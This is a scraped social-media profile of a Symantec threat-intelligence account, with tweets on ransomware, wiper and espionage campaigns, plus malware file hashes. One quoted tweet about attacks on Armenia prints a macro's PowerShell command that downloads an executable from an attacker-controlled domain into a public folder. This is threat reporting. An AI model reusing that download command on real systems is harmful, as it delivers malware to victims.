Threat Intelligence Profile Banner
Threat Intelligence Profile
Threat Intelligence

@threatintel

112,693
Followers
385
Following
4,426
Media
14,417
Statuses

Symantec's researchers bring you the latest threat intelligence from the IT security world.

Joined July 2009
Don't wanna be here? Send us removal request.
Pinned Tweet
@threatintel
Threat Intelligence
2 days
Why did attackers using tools associated with Chinese #espionage groups compromise a significant number of telcos in one country? Was it information gathering? Eavesdropping? Developing a disruptive capability? Or something else?
Tweet media one
0
8
14
@threatintel
Threat Intelligence
2 years
New #wiper malware being used in attacks on #Ukraine 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591
16
500
1K
@threatintel
Threat Intelligence
2 years
NEW: This is Daxin, the most advanced Chinese espionage tool we've ever found. Used to spy on governments worldwide.
Tweet media one
10
341
690
@threatintel
Threat Intelligence
7 years
Symantec analysts have confirmed #Petya #ransomware , like #WannaCry , is using #EternalBlue exploit to spread
22
971
486
@threatintel
Threat Intelligence
3 years
Breaking news on our SolarWinds investigation. We've found a previously undocumented piece of malware called Raindrop which was used by the attackers against some targets. #SolarWinds #Raindrop #Sunburst
Tweet media one
5
237
384
@threatintel
Threat Intelligence
2 years
Update on #wiper attacks against #ukraine . In some attacks ransomware was also deployed against affected organizations at the same time as the wiper, likely as a decoy or distraction. IOC: 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382
6
145
221
@threatintel
Threat Intelligence
7 years
#WannaCry has code to provide unique bitcoin address for each victim but defaults to hardcoded addresses as a result of race condition bug
6
248
182
@threatintel
Threat Intelligence
7 years
New strain of #petya ransomware spreading in Europe. Symantec protects as Ransom.Petya #ransomware
Tweet media one
14
320
172
@threatintel
Threat Intelligence
7 years
#Petya checks for preexisting infection by looking for its own filename,usually C:\windows\perfc.Creating this file may help as a killswitch
Tweet media one
7
235
163
@threatintel
Threat Intelligence
7 years
Evidence #WannaCry attackers fixed Bitcoin bug & released variant of malware 13 hours after original; but most infections contain flaw
Tweet media one
6
181
147
@threatintel
Threat Intelligence
2 years
Interesting detail from our analysis of the decoy ransomware used in #ukraine #wiper attacks. Strings made mocking references to U.S. president Joe Biden.
Tweet media one
3
51
123
@threatintel
Threat Intelligence
5 years
Chinese facial recognition company left database exposed online
3
109
96
@threatintel
Threat Intelligence
7 years
#Wannacry can't use unique Bitcoin addresses because of bug, meaning attackers cannot track payment. Users unlikely to get files restored
1
134
86
@threatintel
Threat Intelligence
7 years
BREAKING: New Symantec research reveals stronger links between #Lazarus and #WannaCry
2
106
73
@threatintel
Threat Intelligence
9 months
Our Threat Hunter Team has encountered a new variant of #SiestaGraph , malware that interacts with Microsoft’s Graph API for command and control via Outlook and OneDrive. File hash: fe8f99445ad139160a47b109a8f3291eef9c6a23b4869c48d341380d608ed4cb (1/2)
4
34
72
@threatintel
Threat Intelligence
7 years
Numerous organizations breached in six-year campaign against the energy sector #dragonfly #infosec
Tweet media one
1
116
67
@threatintel
Threat Intelligence
7 years
#Petya ransomware outbreak: Here’s what you need to know #infosec #cybersecurity
Tweet media one
4
135
65
@threatintel
Threat Intelligence
7 years
Symantec has no evidence of a Wannacry email infection vector and no evidence of a non-killswitch version of the worm. #wannacry #wcry
3
67
66
@threatintel
Threat Intelligence
8 years
#Spam campaign baits users with #Visa rewards emails that spread #TeslaCrypt #ransomware
Tweet media one
0
80
25
@threatintel
Threat Intelligence
7 years
BREAKING: First evidence #Vault7 tools were used in known cyberattacks. Targets in 16 countries affected. #Longhorn
Tweet media one
2
123
61
@threatintel
Threat Intelligence
2 years
THREAD: Latest on #WhisperGate wiper attacks. Thanks to cooperation with the community, we can confirm related samples were being built by actors and possibly deployed to unknown victims as early as October 2021. Other unconfirmed samples may date even earlier. [1/4}
2
30
61
@threatintel
Threat Intelligence
2 years
Chinese APT Group #Cicada (aka #APT10 ) Widens Targeting in Recent Espionage Activity - gov orgs and NGOs among targets. Read more: #infosec
Tweet media one
2
35
61
@threatintel
Threat Intelligence
7 years
. @Symantec has now blocked 47 million attempted #WannaCry ransomware attacks worldwide. Heat map shows how rapidly the #ransomware spread.
0
72
53
@threatintel
Threat Intelligence
7 years
BREAKING: Symantec has identified further possible links between #LazarusGroup and #wannacry
2
82
48
@threatintel
Threat Intelligence
8 years
Hackers hijack WhatsApp and Telegram accounts using security flaws in Signaling System Number 7 (SS7) protocol
1
76
49
@threatintel
Threat Intelligence
6 years
Symantec uncovers FASTCash malware used by Lazarus group to steal millions from ATMs #LazarusAPT
Tweet media one
3
50
43
@threatintel
Threat Intelligence
10 days
Our Threat Hunter Team has found some evidence that attackers linked to Black Basta may have exploited CVE-2024-26169 as a zero-day prior to patching #ZeroDay #Ransomware #BlackBasta
Tweet media one
0
31
55
@threatintel
Threat Intelligence
7 years
Heatmap shows how #WannaCry spread across the globe #ransomware #infosec #CyberSecurity
1
96
47
@threatintel
Threat Intelligence
7 years
Two new #wannacry variants found: One had modified killswitch. Second has killswitch disabled, but ransomware payload doesn't execute.
2
78
49
@threatintel
Threat Intelligence
2 years
#Spring4Shell - what you need to know about this new bug. Read more here:
Tweet media one
1
16
47
@threatintel
Threat Intelligence
7 years
NEW: If #petya finds certain Norton or Symantec processes running it will not use EternalBlue or EternalRomance to spread
4
49
49
@threatintel
Threat Intelligence
11 months
Our Threat Hunter team has found evidence of updated tooling by the Clubhorn APT group (aka #SideCopy ). Recent attack involved modified version of #NightFury backdoor. (1/5)
1
15
47
@threatintel
Threat Intelligence
4 months
Fresh wave of BiBi wiper attacks against Israeli targets this week. Interesting reference in code. #bibwiper (1/2)
Tweet media one
2
22
49
@threatintel
Threat Intelligence
7 years
Do you want to work in #cybersecurity ? Read this advice from 15 women working in the industry #infosec #GHC17
Tweet media one
1
37
47
@threatintel
Threat Intelligence
6 years
#MobilePrivacy : We tested the top 100 free #Android and #iOS apps. Here's what we found.
Tweet media one
1
38
44
@threatintel
Threat Intelligence
8 years
Addicted to #PokemonGO ? Protect your device from scams, malware, and privacy issues:
Tweet media one
0
34
42
@threatintel
Threat Intelligence
2 years
#Cranefly - Threat Actor Uses Previously Unseen Techniques and Tools in Stealthy Campaign #infosec #cybersecurity
Tweet media one
0
31
43
@threatintel
Threat Intelligence
4 years
Study reveals that 1 out of every 142 passwords is 123456
2
31
45
@threatintel
Threat Intelligence
7 years
Some files locked by #WannaCry can be decrypted, #Symantec analysts found #tech #infosec #cybersecurity
Tweet media one
2
82
41
@threatintel
Threat Intelligence
3 years
Side-channel attack can recover encryption keys from Google Titan, YubiKey security keys
1
17
46
@threatintel
Threat Intelligence
7 years
In-browser #cryptocurrency mining makes an unlikely comeback in 2017 but not everyone is happy. Check out our blog and #infographic for more: #monero #bitcoin #cryptomining
Tweet media one
2
95
43
@threatintel
Threat Intelligence
7 years
BREAKING: #Sowbug , previously unknown #cyberespionage group targeting South America and Southeast Asia. #Infosec
Tweet media one
2
65
44
@threatintel
Threat Intelligence
9 months
Our Threat Hunter Team has discovered a few more IOCs relating to publicly reported attacks against airport and security targets in Armenia. (Documented here: and here ) (1 of 5)
@HaoZhixiang
zhixiang hao
9 months
APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia,There is vba macro code powershell iwr https://karabakhtelekom[.com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
34
96
1
25
43
@threatintel
Threat Intelligence
7 years
Android.Doublehidden uses several techniques to hide itself on devices, collect info, display ads
Tweet media one
0
29
42
@threatintel
Threat Intelligence
7 years
New type of attack targets fresh installs of WordPress #WordPress
0
39
38
@threatintel
Threat Intelligence
4 years
FBI: Iranian hacking group attacking F5 networking devices
4
21
38
@threatintel
Threat Intelligence
7 years
Hundreds of high-profile Twitter accounts hacked through third-party app
3
67
37
@threatintel
Threat Intelligence
2 years
Destructive #wiper attacks precede Russian invasion of #Ukraine . Here's what we know so far:
Tweet media one
0
24
39
@threatintel
Threat Intelligence
7 years
Hit me baby one more time: Cyber espionage group hide C&C address in Britney Spears’ Instagram feed
0
34
35
@threatintel
Threat Intelligence
5 years
Nemty ransomware now being spread by the Trik botnet. Find out more:
Tweet media one
4
22
36
@threatintel
Threat Intelligence
7 years
#wannacry attackers not giving up on trying to get payments. New message being sent to victims.
Tweet media one
6
88
34
@threatintel
Threat Intelligence
7 years
Wannacry victims may be able to recover their files. Further details here:
2
49
36
@threatintel
Threat Intelligence
4 years
Microsoft removed 18 Azure AD apps used by Chinese state-sponsored hackers
0
29
39
@threatintel
Threat Intelligence
7 years
. @Symantec has confirmed that #BadRabbit uses the #EternalRomance exploit to spread. Read our updated blog:
Tweet media one
1
62
36
@threatintel
Threat Intelligence
6 years
Symantec uncovers #Leafminer APT targeting government orgs, businesses in the Middle East since 2017
Tweet media one
1
55
37
@threatintel
Threat Intelligence
7 years
All you need to know about the Wannacry Ransomware: #wannacry #wcry #ransomware
5
60
35
@threatintel
Threat Intelligence
6 years
There’s no “I” in Telegram: Dodgy app looks like legitimate version but with some shady extra features
Tweet media one
4
42
34
@threatintel
Threat Intelligence
6 years
Working in Cyber Security: “The ability to not shy away from challenges goes a long way in this industry” #infosec #careers #tech
Tweet media one
0
20
35
@threatintel
Threat Intelligence
4 years
Sodinokibi: Ransomware Attackers also Scanning for PoS Software, Leveraging Cobalt Strike. Read more: #ransomware #Sodinokibi
Tweet media one
0
13
28
@threatintel
Threat Intelligence
2 years
Read our blog to find out how advanced malware #Daxin attempts to evade detection by using communication techniques that can blend in unseen with normal network traffic on a victim network. Learn more: #infosec
Tweet media one
1
27
34
@threatintel
Threat Intelligence
7 years
What you need to know about the security of voice-activated smart speakers
Tweet media one
0
30
35
@threatintel
Threat Intelligence
5 years
REVEALED: Buckeye espionage outfit was using Equation Group tools at least a year prior to the Shadow Brokers leak. Read more: #apt3 #equation #shadowbrokers
Tweet media one
0
40
34
@threatintel
Threat Intelligence
7 years
#Tech : The Incredible Hack: Five of the worst on-screen hacking scenes #hacking #infosec
1
34
34
@threatintel
Threat Intelligence
6 years
Malicious #PowerShell attacks increased by 661 percent from the last half of 2017 to the first half of 2018. Read more in our blog:
Tweet media one
0
35
33
@threatintel
Threat Intelligence
6 years
Should you be worried about the new #Meltdown and #Spectre vulnerabilities? Here's what you need to know:
Tweet media one
0
38
32
@threatintel
Threat Intelligence
7 years
Symantec can confirm that MEDoc software was used to seed initial infections of #petya ransomware
0
54
32
@threatintel
Threat Intelligence
6 years
. @Symantec has identified the #Orangeworm attack group, which uses the #Kwampirs malware to target large healthcare-related firms in the U.S., Europe, and Asia
Tweet media one
1
42
31
@threatintel
Threat Intelligence
7 years
Service claims to have access to SS7 network, charging $500 to track phones, intercept calls, texts
1
43
32
@threatintel
Threat Intelligence
6 years
Patch now! Oracle fixes a record 334 vulnerabilities in July patch update
2
43
31
@threatintel
Threat Intelligence
7 years
Malware used in watering hole attacks on Polish banks has tentative links to #Lazarus group
Tweet media one
0
82
31
@threatintel
Threat Intelligence
7 years
#IoT has been one of the big areas of concern in #cybersecurity in recent times. Read about it in #ISTR17
Tweet media one
0
43
27
@threatintel
Threat Intelligence
7 years
Nine payments have been made into #Bitcoin wallet associated with #Petya so far #ransomware #infosec
1
47
30
@threatintel
Threat Intelligence
2 years
Governments in Asia subjected to ongoing espionage campaign by attackers previously linked to #ShadowPad Trojan. #APT #Cyberespionage
Tweet media one
0
23
27
@threatintel
Threat Intelligence
4 years
UPDATE on our #WastedLocker investigation. Dozens of US newspaper websites owned by the same parent company were compromised by attackers in order to infect potential targets. Symantec has notified the company and it has now removed the malicious code.
1
22
28
@threatintel
Threat Intelligence
5 years
NEW: Symantec finds evidence #Waterbug attackers may have hijacked a separate espionage group’s infrastructure during attack on target in Middle East. #Turla #Crambus #Oilrig
Tweet media one
1
34
31
@threatintel
Threat Intelligence
2 years
North Korean tech freelancers are earning money for authoritarian government
0
15
30
@threatintel
Threat Intelligence
6 years
Meet #Thrip , an espionage group currently targeting satellite communications, telecoms, and defense companies in the U.S. and SE Asia
Tweet media one
3
44
30
@threatintel
Threat Intelligence
7 years
Here's what you need to know about the #KRACKs #WPA2 WI-Fi #vulnerability #infosec
Tweet media one
0
44
31
@threatintel
Threat Intelligence
4 years
#CyberCrime - Attacks from Malicious IP Hit Multiple Machines in Several Countries #infosec #research
Tweet media one
0
25
28
@threatintel
Threat Intelligence
1 year
#NEW - #Graphican - #Flea ( #APT15 ) Uses New Tool in Attacks Targeting Foreign Ministries - backdoor leverages Microsoft Graph API for C&C communication.
Tweet media one
0
20
28
@threatintel
Threat Intelligence
6 years
The A to Z of cyber security: From #BEC scams, to DDoS attacks, and #WannaCry . Read our brief guide to the world of #cybersecurity
Tweet media one
0
13
27
@threatintel
Threat Intelligence
6 years
Think everyone who works in #infosec has been hacking since they were a kid? Not necessarily: Working in Cyber Security: “I didn’t have any interest in computers when I was in school” #careeradvice
Tweet media one
2
8
27
@threatintel
Threat Intelligence
4 years
Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign Linked to Cicada (aka #APT10 ) Attack Group   #infosec #Japan
Tweet media one
1
14
27
@threatintel
Threat Intelligence
10 years
Shellshock: All you need to know about the Bash Bug vulnerability http://t.co/9pErkB9M3L #Shellshock #BashBug http://t.co/J3JMND0niM
Tweet media one
0
53
28